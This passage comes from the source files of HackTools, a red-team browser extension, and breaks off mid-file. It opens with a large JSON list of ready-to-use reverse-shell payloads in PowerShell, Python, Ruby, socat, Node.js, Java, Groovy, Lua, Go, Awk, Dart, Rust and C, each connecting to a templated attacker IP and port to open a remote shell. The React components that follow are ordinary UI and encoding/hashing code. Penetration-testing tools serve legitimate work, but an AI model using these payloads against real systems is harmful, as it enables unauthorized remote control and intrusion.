-ep bypass -c \\\"$TCPClient = New-Object Net.Sockets.TCPClient('${values.ip}', ${values.port});$NetworkStream = $TCPClient.GetStream();$SslStream = New-Object Net.Security.SslStream($NetworkStream,$false,({$true} -as [Net.Security.RemoteCertificateValidationCallback]));$SslStream.AuthenticateAsClient('cloudflare-dns.com',$null,$false);if(!$SslStream.IsEncrypted -or !$SslStream.IsSigned) {$SslStream.Close();exit}$StreamWriter = New-Object IO.StreamWriter($SslStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()};WriteToStream '';while(($BytesRead = $SslStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()\\\"\",\n \"tags\": [\n \"windows\"\n ]\n },\n {\n \"name\": \"Python #1\",\n \"command\": \"export RHOST=\\\"${values.ip}\\\";export RPORT=${values.port};python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(\\\"RHOST\\\"),int(os.getenv(\\\"RPORT\\\"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\\\"{shell}\\\")'\",\n \"tags\": [\n \"linux\",\n \"mac\"\n ]\n },\n {\n \"name\": \"Python #2\",\n \"command\": \"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"${values.ip}\\\",${values.port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\\\"{shell}\\\")'\",\n \"tags\": [\n \"linux\",\n \"mac\"\n ]\n },\n {\n \"name\": \"Python3 #1\",\n \"command\": \"export RHOST=\\\"${values.ip}\\\";export RPORT=${values.port};python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(\\\"RHOST\\\"),int(os.getenv(\\\"RPORT\\\"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\\\"{shell}\\\")'\",\n \"tags\": [\n \"linux\",\n \"mac\"\n ]\n },\n {\n \"name\": \"Python3 #2\",\n \"command\": \"python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"${values.ip}\\\",${values.port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\\\"{shell}\\\")'\",\n \"tags\": [\n \"linux\",\n \"mac\"\n ]\n },\n {\n \"name\": \"Python3 Windows\",\n \"command\": \"import os,socket,subprocess,threading;\\ndef s2p(s, p):\\n while True:\\n data = s.recv(1024)\\n if len(data) > 0:\\n p.stdin.write(data)\\n p.stdin.flush()\\n\\ndef p2s(s, p):\\n while True:\\n s.send(p.stdout.read(1))\\n\\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\\ns.connect((\\\"${values.ip}\\\",${values.port}))\\n\\np=subprocess.Popen([\\\"{shell}\\\"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)\\n\\ns2p_thread = threading.Thread(target=s2p, args=[s, p])\\ns2p_thread.daemon = True\\ns2p_thread.start()\\n\\np2s_thread = threading.Thread(target=p2s, args=[s, p])\\np2s_thread.daemon = True\\np2s_thread.start()\\n\\ntry:\\n p.wait()\\nexcept KeyboardInterrupt:\\n s.close()\",\n \"tags\": [\n \"windows\"\n ]\n },\n {\n \"name\": \"Python3 shortest\",\n \"command\": \"python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\\\"${values.ip}\\\",${values.port}));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\\\"{shell}\\\")'\",\n \"tags\": [\n \"linux\"\n ]\n },\n {\n \"name\": \"Ruby #1\",\n \"command\": \"ruby -rsocket -e'spawn(\\\"sh\\\",[:in,:out,:err]=>TCPSocket.new(\\\"${values.ip}\\\",${values.port}))'\",\n \"tags\": [\n \"linux\",\n \"mac\"\n ]\n },\n {\n \"name\": \"Ruby no sh\",\n \"command\": \"ruby -rsocket -e'exit if fork;c=TCPSocket.new(\\\"${values.ip}\\\",\\\"${values.port}\\\");loop{c.gets.chomp!;(exit! if $_==\\\"exit\\\");($_=~/cd (.+)/i?(Dir.chdir($1)):(IO.popen($_,?r){|io|c.print io.read}))rescue c.puts \\\"failed: #{$_}\\\"}'\",\n \"tags\": [\n \"linux\",\n \"mac\"\n ]\n },\n {\n \"name\": \"socat #1\",\n \"command\": \"socat TCP:${values.ip}:${values.port} EXEC:{shell}\",\n \"tags\": [\n \"linux\",\n \"mac\"\n ]\n },\n {\n \"name\": \"socat #2 (TTY)\",\n \"command\": \"socat TCP:${values.ip}:${values.port} EXEC:'{shell}',pty,stderr,setsid,sigint,sane\",\n \"tags\": [\n \"linux\",\n \"mac\"\n ]\n },\n {\n \"name\": \"node.js\",\n \"command\": \"require('child_process').exec('nc -e {shell} ${values.ip} ${values.port}')\",\n \"tags\": [\n \"linux\",\n \"mac\"\n ]\n },\n {\n \"name\": \"node.js #2\",\n \"command\": \"(function(){\\r\\n var net = require(\\\"net\\\"),\\r\\n cp = require(\\\"child_process\\\"),\\r\\n sh = cp.spawn(\\\"\\\\{shell}\\\", []);\\r\\n var client = new net.Socket();\\r\\n client.connect(${values.port}, \\\"${values.ip}\\\", function(){\\r\\n client.pipe(sh.stdin);\\r\\n sh.stdout.pipe(client);\\r\\n sh.stderr.pipe(client);\\r\\n });\\r\\n return \\/a\\/; \\/\\/ Prevents the Node.js application from crashing\\r\\n})();\",\n \"tags\": [\n \"linux\",\n \"mac\",\n \"windows\"\n ]\n },\n {\n \"name\": \"Java #1\",\n \"command\": \"public class shell {\\n public static void main(String[] args) {\\n Process p;\\n try {\\n p = Runtime.getRuntime().exec(\\\"bash -c $@|bash 0 echo bash -i >& /dev/tcp/${values.ip}/${values.port} 0>&1\\\");\\n p.waitFor();\\n p.destroy();\\n } catch (Exception e) {}\\n }\\n}\",\n \"tags\": [\n \"linux\",\n \"mac\"\n ]\n },\n {\n \"name\": \"Java #2\",\n \"command\": \"public class shell {\\n public static void main(String[] args) {\\n ProcessBuilder pb = new ProcessBuilder(\\\"bash\\\", \\\"-c\\\", \\\"$@| bash -i >& /dev/tcp/${values.ip}/${values.port} 0>&1\\\")\\n .redirectErrorStream(true);\\n try {\\n Process p = pb.start();\\n p.waitFor();\\n p.destroy();\\n } catch (Exception e) {}\\n }\\n}\",\n \"tags\": [\n \"linux\",\n \"mac\"\n ]\n },\n {\n \"name\": \"Java #3\",\n \"command\": \"import java.io.InputStream;\\nimport java.io.OutputStream;\\nimport java.net.Socket;\\n\\npublic class shell {\\n public static void main(String[] args) {\\n String host = \\\"${values.ip}\\\";\\n int port = ${values.port};\\n String cmd = \\\"{shell}\\\";\\n try {\\n Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();\\n Socket s = new Socket(host, port);\\n InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();\\n OutputStream po = p.getOutputStream(), so = s.getOutputStream();\\n while (!s.isClosed()) {\\n while (pi.available() > 0)\\n so.write(pi.read());\\n while (pe.available() > 0)\\n so.write(pe.read());\\n while (si.available() > 0)\\n po.write(si.read());\\n so.flush();\\n po.flush();\\n Thread.sleep(50);\\n try {\\n p.exitValue();\\n break;\\n } catch (Exception e) {}\\n }\\n p.destroy();\\n s.close();\\n } catch (Exception e) {}\\n }\\n}\",\n \"tags\": [\n \"windows\",\n \"linux\",\n \"mac\"\n ]\n },\n {\n \"name\": \"Javascript\",\n \"command\": \"String command = \\\"var host = \\\\'${values.ip}\\\\';\\\" +\\r\\n \\\"var port = ${values.port};\\\" +\\r\\n \\\"var cmd = \\\\'{shell}\\\\';\\\"+\\r\\n \\\"var s = new java.net.Socket(host, port);\\\" +\\r\\n \\\"var p = new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();\\\"+\\r\\n \\\"var pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();\\\"+\\r\\n \\\"var po = p.getOutputStream(), so = s.getOutputStream();\\\"+\\r\\n \\\"print (\\\\'Connected\\\\');\\\"+\\r\\n \\\"while (!s.isClosed()) {\\\"+\\r\\n \\\" while (pi.available() > 0)\\\"+\\r\\n \\\" so.write(pi.read());\\\"+\\r\\n \\\" while (pe.available() > 0)\\\"+\\r\\n \\\" so.write(pe.read());\\\"+\\r\\n \\\" while (si.available() > 0)\\\"+\\r\\n \\\" po.write(si.read());\\\"+\\r\\n \\\" so.flush();\\\"+\\r\\n \\\" po.flush();\\\"+\\r\\n \\\" java.lang.Thread.sleep(50);\\\"+\\r\\n \\\" try {\\\"+\\r\\n \\\" p.exitValue();\\\"+\\r\\n \\\" break;\\\"+\\r\\n \\\" }\\\"+\\r\\n \\\" catch (e) {\\\"+\\r\\n \\\" }\\\"+\\r\\n \\\"}\\\"+\\r\\n \\\"p.destroy();\\\"+\\r\\n \\\"s.close();\\\";\\r\\nString x = \\\"\\\\\\\"\\\\\\\".getClass().forName(\\\\\\\"javax.script.ScriptEngineManager\\\\\\\").newInstance().getEngineByName(\\\\\\\"JavaScript\\\\\\\").eval(\\\\\\\"\\\"+command+\\\"\\\\\\\")\\\";\\r\\nref.add(new StringRefAddr(\\\"x\\\", x);\",\n \"tags\": [\n \"linux\",\n \"mac\",\n \"windows\"\n ]\n },\n {\n \"name\": \"Groovy\",\n \"command\": \"String host=\\\"${values.ip}\\\";int port=${values.port};String cmd=\\\"{shell}\\\";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();\",\n \"tags\": [\n \"windows\"\n ]\n },\n {\n \"name\": \"telnet\",\n \"command\": \"TF=$(mktemp -u);mkfifo $TF && telnet ${values.ip} ${values.port} 0<$TF | {shell} 1>$TF\",\n \"tags\": [\n \"linux\",\n \"mac\"\n ]\n },\n {\n \"name\": \"zsh\",\n \"command\": \"zsh -c 'zmodload zsh/net/tcp && ztcp ${values.ip} ${values.port} && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'\",\n \"tags\": [\n \"linux\",\n \"mac\"\n ]\n },\n {\n \"name\": \"Lua #1\",\n \"command\": \"lua -e \\\"require('socket');require('os');t=socket.tcp();t:connect('${values.ip}','${values.port}');os.execute('{shell} -i <&3 >&3 2>&3');\\\"\",\n \"tags\": [\n \"linux\"\n ]\n },\n {\n \"name\": \"Lua #2\",\n \"command\": \"lua5.1 -e 'local host, port = \\\"${values.ip}\\\", ${values.port} local socket = require(\\\"socket\\\") local tcp = socket.tcp() local io = require(\\\"io\\\") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, \\\"r\\\") local s = f:read(\\\"*a\\\") f:close() tcp:send(s) if status == \\\"closed\\\" then break end end tcp:close()'\",\n \"tags\": [\n \"linux\",\n \"windows\"\n ]\n },\n {\n \"name\": \"Golang\",\n \"command\": \"echo 'package main;import\\\"os/exec\\\";import\\\"net\\\";func main(){c,_:=net.Dial(\\\"tcp\\\",\\\"${values.ip}:${values.port}\\\");cmd:=exec.Command(\\\"{shell}\\\");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go\",\n \"tags\": [\n \"linux\",\n \"mac\",\n \"windows\"\n ]\n },\n {\n \"name\": \"Vlang\",\n \"command\": \"echo 'import os' > /tmp/t.v && echo 'fn main() { os.system(\\\"nc -e {shell} ${values.ip} ${values.port} 0>&1\\\") }' >> /tmp/t.v && v run /tmp/t.v && rm /tmp/t.v\",\n \"tags\": [\n \"linux\",\n \"mac\"\n ]\n },\n {\n \"name\": \"Awk\",\n \"command\": \"awk 'BEGIN {s = \\\"/inet/tcp/0/${values.ip}/${values.port}\\\"; while(42) { do{ printf \\\"shell>\\\" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != \\\"exit\\\") close(s); }}' /dev/null\",\n \"tags\": [\n \"linux\",\n \"mac\"\n ]\n },\n {\n \"name\": \"Dart\",\n \"command\": \"import 'dart:io';\\nimport 'dart:convert';\\n\\nmain() {\\n Socket.connect(\\\"${values.ip}\\\", ${values.port}).then((socket) {\\n socket.listen((data) {\\n Process.start('{shell}', []).then((Process process) {\\n process.stdin.writeln(new String.fromCharCodes(data).trim());\\n process.stdout\\n .transform(utf8.decoder)\\n .listen((output) { socket.write(output); });\\n });\\n },\\n onDone: () {\\n socket.destroy();\\n });\\n });\\n}\",\n \"tags\": [\n \"linux\",\n \"mac\",\n \"windows\"\n ]\n },\n {\n \"name\": \"Rust\",\n \"command\": \"use std::net::TcpStream;\\nuse std::os::unix::io::{AsRawFd, FromRawFd};\\nuse std::process::{Command, Stdio};\\n\\nfn main() {\\n let s = TcpStream::connect(\\\"${values.ip}:${values.port}\\\").unwrap();\\n let fd = s.as_raw_fd();\\n Command::new(\\\"{shell}\\\")\\n .arg(\\\"-i\\\")\\n .stdin(unsafe { Stdio::from_raw_fd(fd) })\\n .stdout(unsafe { Stdio::from_raw_fd(fd) })\\n .stderr(unsafe { Stdio::from_raw_fd(fd) })\\n .spawn()\\n .unwrap()\\n .wait()\\n .unwrap();\\n}\",\n \"tags\": [\n \"linux\",\n \"mac\",\n \"windows\"\n ]\n },\n {\n \"name\": \"C\",\n \"command\": \"#include \\n#include \\n#include \\n#include \\n#include \\n\\n#define REMOTE_ADDR \\\"${values.ip}\\\"\\n#define REMOTE_PORT ${values.port} \\n\\nint main(int argc, char *argv[])\\n{\\n struct sockaddr_in sa;\\n int s;\\n\\n sa.sin_family = AF_INET;\\n sa.sin_addr.s_addr = inet_addr(REMOTE_ADDR);\\n sa.sin_port = htons(REMOTE_PORT);\\n\\n s = socket(AF_INET, SOCK_STREAM, 0);\\n connect(s, (struct sockaddr *)&sa, sizeof(sa));\\n dup2(s, 0);\\n dup2(s, 1);\\n dup2(s, 2);\\n\\n execve(\\\"{shell}\\\", 0, 0);\\n return 0;\\n}\",\n \"tags\": [\n \"linux\",\n \"mac\",\n \"windows\"\n ]\n }\n]" }, { "path": "src/assets/img/icons/iconfont.js", "content": "!function(t){var c,l,h,a,o,v='',i=(i=document.getElementsByTagName(\"script\"))[i.length-1].getAttribute(\"data-injectcss\"),e=function(t,c){c.parentNode.insertBefore(t,c)};if(i&&!t.__iconfont__svg__cssinject__){t.__iconfont__svg__cssinject__=!0;try{document.write(\"\")}catch(t){console&&console.log(t)}}function s(){o||(o=!0,h())}function m(){try{a.documentElement.doScroll(\"left\")}catch(t){return void setTimeout(m,50)}s()}c=function(){var t,c;(c=document.createElement(\"div\")).innerHTML=v,v=null,(t=c.getElementsByTagName(\"svg\")[0])&&(t.setAttribute(\"aria-hidden\",\"true\"),t.style.position=\"absolute\",t.style.width=0,t.style.height=0,t.style.overflow=\"hidden\",c=t,(t=document.body).firstChild?e(c,t.firstChild):t.appendChild(c))},document.addEventListener?~[\"complete\",\"loaded\",\"interactive\"].indexOf(document.readyState)?setTimeout(c,0):(l=function(){document.removeEventListener(\"DOMContentLoaded\",l,!1),c()},document.addEventListener(\"DOMContentLoaded\",l,!1)):document.attachEvent&&(h=c,a=t.document,o=!1,m(),a.onreadystatechange=function(){\"complete\"==a.readyState&&(a.onreadystatechange=null,s())})}(window);" }, { "path": "src/components/AboutUs.tsx", "content": "import React from 'react';\nimport { Typography, Divider } from 'antd';\n\nconst { Title, Paragraph, Link } = Typography;\n\nexport default function AboutUs () {\n return (\n
\n \n About us\n \n \n Our story of two students creating this app\n \n \n \n \n HackTools, is a web extension facilitating your web application penetration tests, it includes cheat\n sheets as well as all the tools used during a test such as XSS payloads, Reverse shells and much\n more. With the extension you no longer need to search for payloads in different websites or in your\n local storage space, most of the tools are accessible in one click. HackTools is accessible either\n in pop up mode or in a whole tab in the Devtools part of the browser with F12.\n \n \n Note that this project is maintained, developed and made available for free, you can offer us a\n coffee, it will be very encouraging and greatly appreciated\n \n HackTools is created by Ludovic COULON and Riadh BOUCHAHOUA\n \n \n \n
\n \n \n Contribute\n \n We are always looking for community input into our software. Feel free to contribute to the Hack-Tools repository:\n \n - Contribute the project: https://github.com/LasCC/Hack-Tools\n\n Before submitting a bug report\n Check the open issues, to see if the problem is already reported.\n If you encounter a problem that was reported and closed, check why it was closed and if you think it should be reopened, open a new issue instead.\n - Report a bug: https://github.com/LasCC/Hack-Tools/issues\n \n \n
\n Credits PentestMonkey \n GTFOBins Antd Iconfont CN \n John Hammond The Noun Project \n PayloadsAllTheThings \n Fabien LOISON(flozz) for the p0wny @shell \n GoProSlowYo for the zsh reverse shell \n MITRE ATT&CK \n Thanks to dejisec for the Active Directory scripts ! Link \n
\n \n );\n}\n" }, { "path": "src/components/LayoutApp.tsx", "content": "import React, { useEffect } from 'react';\r\nimport { Layout, Menu, Typography, theme, Button, Select, ConfigProvider, Switch } from 'antd';\r\nimport { CopyrightCircleOutlined, FullscreenOutlined, ArrowsAltOutlined } from '@ant-design/icons';\r\nimport { createFromIconfontCN } from '@ant-design/icons';\r\nimport { goTo } from 'react-chrome-extension-router';\r\nimport ReverseShell from './linux/ReverseShell';\r\nimport PhpReverseShell from './web/PhpReverseShell';\r\nimport TtySpawnShell from './linux/TtySpawnShell';\r\nimport Base64Encode from './encoding/DataEncoding';\r\nimport Hashing from './encoding/Hashing';\r\nimport LinuxCommands from './linux/LinuxCommands';\r\nimport PowershellCommands from './linux/PowershellCommands';\r\nimport LFI from './web/LFI';\r\nimport XSS from './web/XSS';\r\nimport SQLi from './web/SqlInjection';\r\nimport AboutUs from './AboutUs';\r\nimport FeedRSS from './rss/FeedRSS';\r\nimport FileTransfer from './file_transfer/File_transfer';\r\nimport PersistedState from 'use-persisted-state';\r\nimport MSFBuilder from './linux/MSFBuilder';\r\nimport EchoBase64 from './file_transfer/ObfuscatedFiles';\r\nimport Notepad from './notepad/Notepad';\r\n\r\nconst { Paragraph } = Typography;\r\nconst { Sider, Content, Footer } = Layout;\r\nconst IconFont = createFromIconfontCN( {\r\n scriptUrl: [ './iconfont.js' ]\r\n} );\r\n\r\nexport default function LayoutApp ( props: {\r\n children: boolean | React.ReactFragment | React.ReactPortal | null | undefined;\r\n} ) {\r\n\r\n const { defaultAlgorithm, darkAlgorithm } = theme;\r\n const setDarkMode = PersistedState( 'dark_mode' );\r\n const [ darkMode, setDarkModeState ] = setDarkMode( false );\r\n const handleSwtichTheme = ( value: string ) => {\r\n // Set the dark mode state based on the selected value\r\n // We can use the '===' operator because we know the value can only be 'dark' or 'light'.\r\n const isDarkMode = value === 'dark';\r\n setDarkModeState( isDarkMode );\r\n }\r\n\r\n interface IRouterComponent {\r\n key: string;\r\n icon: JSX.Element;\r\n name: string;\r\n componentRoute: React.FunctionComponent;\r\n }\r\n\r\n const Tabs: Array = [\r\n {\r\n key: '1',\r\n icon: ,\r\n name: 'Reverse Shell',\r\n componentRoute: ReverseShell\r\n },\r\n {\r\n key: '2',\r\n icon: ,\r\n name: 'PHP Reverse Shell',\r\n componentRoute: PhpReverseShell\r\n },\r\n {\r\n key: '3',\r\n icon: ,\r\n name: 'TTY Spawn Shell',\r\n componentRoute: TtySpawnShell\r\n },\r\n {\r\n key: '4',\r\n icon: ,\r\n name: 'Useful Linux commands',\r\n componentRoute: LinuxCommands\r\n },\r\n {\r\n key: '5',\r\n icon: , name: 'PowerShell Commands',\r\n componentRoute: PowershellCommands\r\n },\r\n {\r\n key: '6',\r\n icon: ,\r\n name: 'Transfer Methods',\r\n componentRoute: FileTransfer\r\n },\r\n {\r\n key: '7',\r\n icon: ,\r\n name: 'LFI',\r\n componentRoute: LFI\r\n },\r\n {\r\n key: '8',\r\n icon: ,\r\n name: 'XSS',\r\n componentRoute: XSS\r\n },\r\n {\r\n key: '9',\r\n icon: ,\r\n name: 'SQL Injection',\r\n componentRoute: SQLi\r\n },\r\n {\r\n key: '10',\r\n icon: ,\r\n name: 'Data Encoding',\r\n componentRoute: Base64Encode\r\n },\r\n {\r\n key: '11',\r\n icon: ,\r\n name: 'Obfuscated Files or Information',\r\n componentRoute: EchoBase64\r\n },\r\n {\r\n key: '12',\r\n icon: ,\r\n name: 'Hashing',\r\n componentRoute: Hashing\r\n },\r\n {\r\n key: '13',\r\n icon: ,\r\n name: 'Feed RSS',\r\n componentRoute: FeedRSS\r\n },\r\n /* {\r\n key: '13',\r\n icon: (\r\n \r\n \r\n \r\n ),\r\n name: 'HTTP Repeater',\r\n componentRoute: HTTPUtils\r\n }, */\r\n {\r\n key: '14',\r\n icon: ,\r\n name: 'MSF Builder',\r\n componentRoute: MSFBuilder\r\n },\r\n {\r\n key: '15',\r\n icon: ,\r\n name: 'About us',\r\n componentRoute: AboutUs\r\n }\r\n ];\r\n\r\n const MenuItemsLists = Tabs.map( ( item ) => (\r\n navigate( item )}>\r\n {item.name}\r\n \r\n ) );\r\n\r\n const useMenuIndex = PersistedState( 'tab_index_cache' ); // Disabled for now\r\n const [ index, setIndex ] = useMenuIndex( '1' );\r\n\r\n const navigate = ( { componentRoute, key }: { componentRoute: React.FunctionComponent; key: string } ) => {\r\n goTo( componentRoute );\r\n setIndex( key );\r\n };\r\n\r\n const windowMode = () => {\r\n const width = 1100;\r\n const height = 800;\r\n\r\n chrome.windows.create( {\r\n url: chrome.runtime.getURL( 'index.html' ),\r\n width: width,\r\n height: height,\r\n type: 'popup'\r\n } );\r\n };\r\n\r\n useEffect( () => {\r\n const currentComponent = Tabs.filter( ( obj ) => obj.key === index )[ 0 ].componentRoute;\r\n goTo( currentComponent );\r\n }, [] );\r\n\r\n const target = window.location.href;\r\n\r\n const handleHatClick = () => {\r\n const notepad_route_ctx = {\r\n key: '1',\r\n name: 'Hat Clicked',\r\n componentRoute: Notepad\r\n }\r\n\r\n navigate( notepad_route_ctx );\r\n };\r\n\r\n return (\r\n \r\n \r\n \r\n
\r\n \r\n \r\n \r\n \r\n \r\n
\r\n\r\n \r\n {MenuItemsLists}\r\n \r\n \r\n \r\n \r\n {props.children}\r\n \r\n
\r\n Hack Tools - The all in one Red team browser extension for web\r\n pentesters\r\n Ludovic COULON - Riadh BOUCHAHOUA\r\n 
HackTools Version - 0.5.0
\r\n \r\n \r\n \r\n
\r\n \r\n \r\n \r\n );\r\n}\r\n" }, { "path": "src/components/encoding/DataEncoding.tsx", "content": "import React, { useState } from 'react';\nimport { Button, Input, Typography, message, Divider, Menu, Dropdown } from 'antd';\nimport { CopyOutlined, createFromIconfontCN, ClearOutlined, DownOutlined } from '@ant-design/icons';\nimport Clipboard from 'react-clipboard.js';\nimport escape_quotes from 'escape-quotes';\n\nconst { Title, Paragraph } = Typography;\nconst IconFont = createFromIconfontCN( {\n scriptUrl: [ './iconfont.js' ]\n} );\n\nfunction toHex ( str: string ) {\n var result: string = '';\n for ( var i: number = 0; i < str.length; i++ ) {\n var hex: string = str.charCodeAt( i ).toString( 16 ).toUpperCase();\n if ( hex.length === 1 ) {\n hex = '0' + hex;\n }\n result += hex;\n }\n return result;\n}\nfunction hex2a ( hex: string ) {\n var str: string = '';\n for ( var i: number = 0; i < hex.length; i += 2 ) {\n var code: number = parseInt( hex.substr( i, 2 ), 16 );\n if ( !isNaN( code ) ) {\n str += String.fromCharCode( code );\n }\n }\n return str;\n}\n\nconst Base64Encode = () => {\n const [ input, setInput ] = useState( '' );\n const [ output, setOutput ] = useState( '' );\n const { TextArea } = Input;\n const successBase64Copy = () => {\n message.success( 'Your payload has been copied successfully !' );\n };\n const handleChange = ( _name: string ) => ( event: { target: { value: React.SetStateAction } } ) => {\n setInput( event.target.value );\n };\n const handleClick = ( type: string ) => {\n let output;\n let errorMessage;\n switch ( type ) {\n case \"encode\":\n switch ( encMode ) {\n case \"base64\":\n output = btoa( input );\n break;\n case \"uri\":\n try {\n output = encodeURI( input );\n } catch ( error ) {\n errorMessage = \"Incorrect format, please try something else.\";\n }\n break;\n case \"hex\":\n try {\n output = toHex( input );\n } catch ( error ) {\n errorMessage = \"Incorrect Hex, please try something else.\";\n }\n break;\n }\n break;\n case \"decode\":\n switch ( encMode ) {\n case \"base64\":\n try {\n output = atob( input );\n } catch ( ex ) {\n errorMessage = \"Incorrect Base64, please try something else.\";\n }\n break;\n case \"uri\":\n try {\n output = decodeURI( input );\n } catch ( ex ) {\n errorMessage = \"Incorrect URI, please try something else.\";\n }\n break;\n case \"hex\":\n try {\n output = hex2a( input );\n } catch ( ex ) {\n errorMessage = \"Incorrect hexadecimal, please try something else.\";\n }\n break;\n }\n break;\n }\n setOutput( errorMessage ? \"Unable to decode properly: \" + errorMessage : output );\n if ( errorMessage ) {\n message.error( errorMessage );\n }\n };\n const [ encMode, setEncmode ] = useState( 'base64' );\n const handleQuoteEscaper = () => {\n setOutput( escape_quotes( input ) );\n };\n\n const handleEncModeList = ( type: { key: React.SetStateAction } ) => {\n setEncmode( type.key.toString() );\n };\n\n const menu = (\n \n Base64\n \n URI\n \n Hexadecimal\n \n );\n\n return (\n
\n
\n \n Data Encoding\n \n \n Adversaries may encode data to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system. Use of data encoding may adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64, MIME, or other binary-to-text and character encoding systems.Some data encoding systems may also result in data compression, such as gzip.\n \n
\n \n \n \n\n \n \n {encMode} \n \n \n\n handleClick( 'encode' )}\n >\n \n Encode\n \n handleClick( 'decode' )}\n >\n \n Decode\n \n handleQuoteEscaper()}\n >\n \n Quote escape\n \n
\n \n \n \n \n \n setOutput( '' )}\n >\n Clear\n \n \n \n );\n};\n\nexport default Base64Encode;\n" }, { "path": "src/components/encoding/Hashing.tsx", "content": "import React, { useState } from 'react';\nimport { Button, Input, Typography, Menu, Dropdown, Divider, message } from 'antd';\nimport { CopyOutlined, DownOutlined, ArrowsAltOutlined, createFromIconfontCN } from '@ant-design/icons';\nimport MD5 from 'crypto-js/md5';\nimport SHA1 from 'crypto-js/sha1';\nimport SHA256 from 'crypto-js/sha256';\nimport SHA512 from 'crypto-js/sha512';\n//@ts-ignore\nimport Sm3 from 'sm3';\nimport Clipboard from 'react-clipboard.js';\n\nconst { Title, Paragraph, Text } = Typography;\nconst { TextArea } = Input;\nconst IconFont = createFromIconfontCN( {\n scriptUrl: [ './iconfont.js' ]\n} );\n\nconst HashEncode = () => {\n const [ input, setInput ] = useState( '' );\n const [ _, setHashType ] = useState( '0' );\n const [ hashname, setHashname ] = useState( 'MD5' );\n const [ output, setOutput ] = useState( '' );\n const handleClick = ( type: { key: React.SetStateAction } ) => {\n setHashType( type.key );\n resolvehashname( type.key );\n };\n const handleEncode = ( hashtype: string ) => {\n let output: string;\n switch ( hashtype ) {\n case 'MD5':\n output = MD5( input, undefined ).toString();\n break;\n case 'SHA1':\n output = SHA1( input, undefined ).toString();\n break;\n case 'SHA256':\n output = SHA256( input, undefined ).toString();\n break;\n case 'SHA512':\n output = SHA512( input, undefined ).toString();\n break;\n case 'SM3':\n output = Sm3( input );\n break;\n default:\n // If the hashtype is not recognized, return an empty string\n output = '';\n }\n setOutput( output );\n };\n const successInfoHashing = () => {\n message.success( 'Your hash has been copied successfully !' );\n };\n const resolvehashname = ( hashindex: string ): 'Choose the Hash type' => {\n switch ( hashindex ) {\n case '0':\n setHashname( 'MD5' );\n break;\n case '1':\n setHashname( 'SHA1' );\n break;\n case '2':\n setHashname( 'SHA256' );\n break;\n case '3':\n setHashname( 'SHA512' );\n break;\n case '4':\n setHashname( 'SM3' );\n break;\n }\n return 'Choose the Hash type';\n };\n\n const menu = (\n \n handleEncode( 'MD5' )}>\n MD5\n \n \n handleEncode( 'SHA1' )}>\n SHA1\n \n handleEncode( 'SHA256' )}>\n SHA256\n \n handleEncode( 'SHA512' )}>\n SHA512\n \n handleEncode( 'SM3' )}>\n SM3\n \n \n );\n\n const handleChange = ( _name: string ) => ( event: { target: { value: React.SetStateAction } } ) => {\n setInput( event.target.value );\n };\n\n return (\n
\n \n Hash generator\n \n \n A hash function is any function that can be used to map data of arbitrary size to fixed-size values. The\n values returned by a hash function are called hash values, hash codes, digests, or simply hashes.\n \n \n
\n \n \n \n {hashname} \n \n \n handleEncode( hashname )}\n >\n Get Hash\n \n
\n
\n \n 
Cryptographic Hash Algorithm : {hashname}
\n \n \n \n \n
\n
\n );\n};\n\nexport default HashEncode;\n" }, { "path": "src/components/encoding/HexEncode.tsx", "content": "import React, { useState } from 'react';\r\nimport { Button, Input, Typography, message, Divider } from 'antd';\r\nimport { CopyOutlined, createFromIconfontCN, ClearOutlined } from '@ant-design/icons';\r\nimport Clipboard from 'react-clipboard.js';\r\n\r\nconst { Title, Paragraph } = Typography;\r\nconst IconFont = createFromIconfontCN( {\r\n scriptUrl: [ './iconfont.js' ]\r\n} );\r\n\r\nfunction toHex ( str: string ): string {\r\n let result = \"\";\r\n for ( const ch of str ) {\r\n let hex = ch.charCodeAt( 0 ).toString( 16 ).toUpperCase();\r\n if ( hex.length < 2 ) {\r\n hex = \"0\" + hex;\r\n }\r\n result += hex;\r\n }\r\n return result;\r\n}\r\n\r\nfunction hex2a ( hex: string ): string {\r\n let str = \"\";\r\n for ( let i = 0; i < hex.length; i += 2 ) {\r\n const hexChar = hex.substr( i, 2 